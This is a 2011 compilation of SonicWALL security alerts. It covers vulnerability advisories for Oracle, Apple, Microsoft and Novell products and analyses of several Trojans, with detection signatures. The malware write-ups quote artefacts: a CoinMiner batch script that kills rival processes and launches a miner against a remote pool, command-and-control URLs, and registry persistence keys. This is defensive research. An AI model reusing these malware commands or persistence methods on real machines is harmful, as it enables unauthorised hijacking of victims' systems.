Oracle Outside In CorelDRAW Integer Overflow (Oct 20, 2011)

/in /by

Oracle Outside In Technology provides software developers with a comprehensive solution to access, transform, and control the contents of unstructured file formats. The file formats include from the office suites, such as Microsoft Office 2007, to specialty formats and legacy files. The tool from Outside In is embedded by multiple client and server products that need parsing of various file formats.

CorelDRAW is a vector graphics editor developed and marketed by Corel Corporation. CorelDRAW uses CDR file format, which is a proprietary file format developed by Corel Corporation and primarily used for vector graphic drawings. Outside In supports Corel Corporation’s CDR file format. This file format is encoded in the hierarchical Resource Interchange File Format (RIFF) format. RIFF is based on the Interchange File Format (IFF) and all multi-byte integers are in little-endian format. The basic storage structure of RIFF is called a chunk. The format of a chunk is illustrated as below: 

 Offset Type    Description ------ ------- ----------------------------------------------------------------- 0x0000 Byte[4] four ASCII character identifier, padded with space if less than 4 0x0004 DWORD   *Size* of Data 0x0008 Byte[]  Size bytes of data, plus one padding byte if Size is odd

The structure of a CorelDRAW file is not publicly known. The following structure represents the reverse engineering of the format:

 RIFF ('CDR8' or 'CDR7' 	'vrsn' (version number?) 	'DISP' 	LIST ('INFO' 		'IKEY' 		... 		) 	LIST ('CMPR' ...) 		LIST ('doc ' 			'mcfg' 			'ptrt' 			LIST('stlt' 				 				) 		) 	)

An integer overflow vulnerability exists in Oracle Outside In. The vulnerability is due to improper bounds checking of the user-supplied chunk data. The data will be used to calculate the size of allocation memory and the memory is filled with user supplied chunk data. Remote attackers could exploit the vulnerability to inject and execute arbitrary code in the context of the vulnerable service or user application.

SonicWALL UTM team has researched this vulnerability and created the following IPS signature to detect the attack attempts.

  • 2483 Oracle Outside In CorelDRAW File Parser Integer Overflow

This vulnerability has been referred by CVE as CVE-2011-3541.

US Postal Service Email Spam (Oct 21, 2011)

/in /by

SonicWALL UTM Research team received reports of a new spam campaign pretending to be arriving from US Postal Service spreading in the wild. It contains the new variant of Dofoil Trojan that SonicWALL blocks as GAV: Dofoil.L. This worm also downloads other malware components including trojans and FakeAV malware.

The sample e-mail format of the spam campaign includes the following:

Subject:

  • USPS Shipment Status IDxxxxxxxx
  • USPS service. Get your parcel IDxxxxxxxx
  • USPS Invoice copy IDxxxxxxxx
  • USPS Tracking number IDxxxxxxxx

Attachment: Post_Label#id{Random Numbers}.zip

The ZIP file attachment contains the malicious executable that disguises itself with the use of Microsoft Word icon as shown below:

    screenshot

Example of the email spam:

    screenshot

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

  • Creates the process SVCHOST.EXE and injects its code.
  • Creates a copy of itself as %application data%csrss.exe and deletes the original executable file

Downloads other malware:

  • %windir%system32msrepl40A.exe – [ detected as GAV: Swisyn.JYB (Trojan) ]
  • %windir%system32wbcache8.exe – [ detected as GAV: Swisyn.JYB (Trojan) ]
  • sl20.exe – [ detected as GAV: EncPk.WX_3 (Trojan) ]
  • setup.exe – [ detected as GAV: Pirminay.ANW (Trojan) ]
  • 574-01.exe – [ detected as GAV: FakeAlert.BHX (Trojan) ]
  • sssss.exe – [ detected as GAV: Danmec.L (Trojan) ]

Added Registry:

  • Key: HKEY_CURRENT_USERSoftwaregtwbetugt
  • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun
    Value: Epsilon Squared
    Data:”%Application Data%csrss.exe”
  • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun
    Value: TKYDMYTE
    Data:”C:WINDOWSSystem32wbcache8.exe”
  • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRun
    Value: Dbft
    Data:”C:WINDOWSSystem32msrepl40A.exe”

Network Activity:

HTTP GET Requests:

  • http://live{REMOVED}128.ru/m07/index.php
  • http://suteki{REMOVED}disc.jp/walking-diet/
  • http://image{REMOVED}ing.be/

DNS Requests:

  • http://live{REMOVED}128.ru

Hosts File Modification:

This malware added the following entries to block access to torrent websites.

  • 127.0.0.1 thepiratebay.org
  • 127.0.0.1 www.thepiratebay.org
  • 127.0.0.1 mininova.org
  • 127.0.0.1 www.mininova.org
  • 127.0.0.1 forum.mininova.org
  • 127.0.0.1 blog.mininova.org
  • 127.0.0.1 suprbay.org
  • 127.0.0.1 www.suprbay.org

FakeAV

After Installing the FakeAV application, it will show a Fake Windows Error Alert as seen below:

    screenshot

    screenshot

    screenshot

Clicking the “Scan and fix” Button will scan for errors and show a fake result:

    screenshot

Clicking the “Fix Errors” button prompts the user to buy the fake security software.

    screenshot

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Dofoil.L#email (Trojan)
  • GAV: Dofoil.L (Trojan)
  • GAV: Swisyn.JYB (Trojan)
  • GAV: EncPk.WX_3 (Trojan)
  • GAV: FakeAlert.BHX (Trojan)
  • GAV: Danmec.L (Trojan)

Hanove Backdoor Trojan (Oct 27, 2011)

/in /by

SonicWALL UTM Research team discovered a new backdoor Trojan in the wild. This backdoor Trojan called Hanove opens a backdoor on the infected system allowing the attacker to send further commands to the compromised system. The Trojan was also observed to be capturing and uploading screenshots of the user’s desktop to a remote server at regular intervals.

It performs the following activities:

  • It ensures persistence of infection across reboots by creating the following startup script
      All UsersStart MenuProgramsStartupsyncdata.vbs
      screenshot

  • It captures screenshots of the user’s desktop at five second intervals and stores it to the following location
      Documents and Settings{user}Desktopshot.bmp
      screenshot

  • It renames the captured screenshot using the current timestamp with the following file format
      mm-dd-yy_HH-MM-SS.jpg

  • It decrypts obfuscated strings in memory to construct the remote URL it contacts. The decryption routine simply decrements the value of each character by one to get the decrypted string.
      screenshot

  • It uploads captured screenshot to a remote URL using the custom user agent string “MBVDFRESCT”
      screenshot

  • It receives the following response if the upload is successful
      screenshot

  • The remote server it connects to is hosted in Pennsylvania, United States and is active at the time of writing this alert

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: Hanove.A (Trojan)
  • GAV: Hanove.A_2 (Trojan)

Apple Safari Webkit libxslt File Creation Vulnerability (Oct 27, 2011)

/in /by

Safari is a web browser application developed by Apple Inc. and included with the Mac OS X and iOS operating systems. It supports retrieving, presenting, and traversing information resources such as web page, image, video on the World Wide Web. Safari is capable of parsing multiple file formats including HTML, CSS, XML, JPG, PIC and so on. Safari is the default web browser for Mac OS X. A simplified version, MobileSafari, runs on Apple iPhone devices. Safari is based on the WebKit rendering engine. WebKit is a development toolkit, which allows third party developers to build applications that use technologies such as HTML and JavaScript. WebKit provides the WebCore HTML parser and the JavaScriptCore JavaScript engine.

Extensible Markup Language (XML) is a set of rules for encoding documents in machine-readable form. It is defined in the XML 1.0 Specification produced by the W3C, and several other related specifications. XSLT is a language with an XML-based syntax that is used to transform XML documents into other XML documents, HTML, or other, unstructured formats such as plain text or RTF. For example:

Sample of incoming XML document:

          John     Smith           Morka     Ismincius

XSLT stylesheet provides templates to transform the XML document:

Its evaluation results in a new XML document, having another structure:

     John   Morka

WebKit uses the GNOME project’s libxslt library for applying XSLT to XML documents. Libxslt supports multiple extensions to XSLT, including many proposed by the EXSLT XSLT extensions initiative, and some found in the Saxon XSLT and XQuery processor. An arbitrary file creation vulnerability exists in Safari’s use of the WebKit rendering engine. A remote attacker can exploit this vulnerability create arbitrary files on the target user’s machine. Remote code execution is possible if the attacker can write a file that will be executed by the host OS.

SonicUTM team has researched this vulnerability and created the following IPS signatures to detect attacks addressing this vulnerability.

  • 2524 Apple Safari Webkit libxslt Arbitrary File Creation 1
  • 2534 Apple Safari Webkit libxslt Arbitrary File Creation 2
  • 7047 Apple Safari Webkit libxslt Arbitrary File Creation Exploit

This vulnerability has been referred by CVE as CVE-2011-1774.

Oracle AutoVueX ActiveX Arbitrary File Creation (Nov 3, 2011)

/in /by

Oracle’s AutoVue enterprise visualization is a suite of Oracle products for viewing, reviewing and collaborating on product, asset and engineering documents and information across remote locations. The AutoVue suite contains an ActiveX control (AutoVueX.ocx) that allows web based interaction with the specified documents.

A file creation vulnerability exists in Oracle’s AutoVueX ActiveX control. Specifically, the vulnerable ActiveX control fail to sanitize parameters in several methods which handle file I/O. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted webpage. Successful exploitation can result in arbitrary file creation or file overwriting on the file system.

SonicWALL has released multiple IPS signatures to detect and block specific exploitation attempts targeting this vulnerability. The signatures are listed below:

  • 2587 Oracle AutoVueX ActiveX Arbitrary File Creation 1
  • 2849 Oracle AutoVueX ActiveX Arbitrary File Creation 2
  • 2921 Oracle AutoVueX ActiveX Arbitrary File Creation 3

New Banker Trojan redirects credentials to remote server (Nov 3, 2011)

/in /by

The Sonicwall UTM research team received reports of a new Banking Trojan in the wild. Banking Trojans steal logon credentials and target specific banks. This Banking Trojan targets users of ITAU bank based in Brazil. The Trojan steals bank logon credentials by redirecting traffic through a remote webserver.

The Trojan adds the following files to the filesystem:

  • {run location}abcde.txt [Detected as GAV: Banker.ITC (Trojan)]
  • C:Documents and SettingsAll UsersApplication Databola7.txt [Detected as GAV: Banload.QLO_2 (Trojan)]
  • C:Documents and SettingsAll UsersApplication Dataclear.exe [Detected as GAV: Banker.SMY_4 (Trojan)]
  • C:Documents and SettingsAll UsersApplication Datacrsrc.exe [Detected as GAV: Banker.SMY_5 (Trojan)]
  • C:Documents and SettingsAll UsersApplication Dataiexplore.exe [Detected as GAV: Banker.SMY_6 (Trojan)]
  • C:Documents and SettingsAll UsersApplication Datambservice.exe [Detected as GAV: Banker.SMY_7 (Trojan)]
  • C:Documents and SettingsAll UsersApplication Datah4714log.txt

h4714log.txt contains the following data:

      tipo=inf
      nomepc={USERNAME}
      mac=08-00-27-{removed}

The Trojan adds the following key to the Windows registry to enable startup after reboot:

  • HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun mbservice.exe “C:Documents and SettingsAll UsersApplication Datambservice.exe”

Upon infection the Trojan replaces itself with {run location}abcde.txt and then runs mbservice.exe. mbservice.exe runs in the background inspecting window title strings. It contains code that looks for a specific window title string “BANCO ITAU – FEITO PARA VOCE” running in Internet Explorer.

The Trojan targets users of ITAU bank. Below is a screenshot of their main page:

The Trojan redirects all traffic through a remote webserver and was observed leaking the following data from h4714log.txt:

The Trojan also leaks data typed into the “Agency” and “Account” boxes and passwords using the virtual keyboard:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Banload.QLO_2 (Trojan)
  • GAV: Banker.SMY_4 (Trojan)
  • GAV: Banker.SMY_5 (Trojan)
  • GAV: Banker.SMY_6 (Trojan)
  • GAV: Banker.SMY_7 (Trojan)

Microsoft Windows TrueType Parsing Engine Code Execution (Nov 3, 2011)

/in /by

TrueType is an outline font standard originally developed by Apple Computer in the late 1980s as a competitor to Adobe’s Type 1 fonts used in PostScript. TrueType has become the most common format for fonts on both the Mac OS and Microsoft Windows operating systems. In Microsoft Windows, the OS uses a Windows component, the Win32k TrueType font parsing engine to analyze the TTF data.

A remote code execution vulnerability has been found in Microsoft Windows. Especially the vulnerability was found in the Win32k TrueType font parsing engine. By exploiting this vulnerability, an attacker could run arbitrary code in kernel mode on the target system. This vulnerability is related to the Duqu malware.

SonicWALL UTM team has researched this vulnerability and released a GAV signature as following:

  • 56984 TTF.Exp.MP.1

The vulnerability has been referred by the vendor, Microsoft as 2639658, and it’s referred by CVE as CVE-2011-3402.

Microsoft Security Bulletin Coverage (Nov 8, 2011)

/in /by

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of November, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-083 Vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

  • CVE-2011-2013 Reference Counter Overflow
    Normal traffic is not distinguishable from malicious traffic.

MS11-084 Vulnerability in Windows Kernel-Mode Drivers Could Allow Denial of Service (2617657)

  • CVE-2011-2004 TrueType Font Parsing Vulnerability
    There is no feasible method of detection.

MS11-085 Vulnerability in Windows Mail and Windows Meeting Space Could Allow Remote Code Execution (2620704)

  • CVE-2011-2016 Windows Mail Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1

MS11-086 Vulnerability in Active Directory Could Allow Elevation of Privilege (2630837)

  • CVE-2011-2014 LDAPS Authentication Bypass Vulnerability
    Normal traffic is not distinguishable from malicious traffic.

Novell GroupWise vCalendar Processing Vulnerability (Oct 7, 2011)

/in /by

Novell GroupWise is a messaging and collaborative software platform that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, NetWare, and Linux. Novell GroupWise Internet Agent is a component of Novell GroupWise and provides email services, supporting SMTP, POP, and IMAP protocols.

vCalendar is a computer file format which allows Internet users to send meeting requests and tasks to other Internet users, via email, or by sharing files with an extension of .vcs. Events which occur on a regular basis can be identified by the property name RRULE. This property defines a rule or repeating pattern for a recurring vCalendar entity.

A heap-based buffer overflow vulnerability exists in Novell GroupWise Internet Agent. Specifically, the vulnerability occurs while processing RRULE data inside a vCalendar object. An attacker can exploit this vulnerability by sending a crafted vCalendar to the Novell GroupWise server. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the Internet Agent service. Code injection that does not result in execution would terminate the service.

The vulnerability has been assigned as CVE-2011-2662.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 6033 Novell GroupWise Internet Agent RRULE Buffer Overflow

New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)

/in /by

The Sonicwall UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive and would take an impractical amount of time to generate a single bitcoin on a personal computer. If however, a hacker were able to compromise a handful of machines with fast parallel Graphics Processing Units it could turn into a very lucrative money making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd
  • C:Documents and Settings{USER}Local SettingsTempacchsbca.exe
  • C:Documents and Settings{USER}Local SettingsTempaccmamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:Documents and Settings{USER}Start MenuProgramsStartupwuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

      ping -n 40 google.com
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

  • HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Start MenuProgramsStartup “C:Documents and Settings{USER}Start MenuProgramsStartup”
  • HKEY_CURRENT_USERSoftwareWinRAR SFX C:Documents and Settings{USER}Local SettingsTempacc “C:Documents and Settings{USER}Local SettingsTempacc”

The Trojan attemps to open the following files:

  • C:Documents and Settings{USER}Start menuProgramsStartupstart.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartuphahahahaha.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupwuT.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk.exe
  • C:Documents and Settings{USER}Start MenuProgramsStartupNoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run “3kal.cmd” via the following command:

      C:Documents and Settings{USER}Local SettingsTempacchsbca.exe "/NOCONSOLE C:Documents and Settings{USER}Local SettingsTempacc3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

  • ping -n 40 google.com

As defined in “3kal.cmd” the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)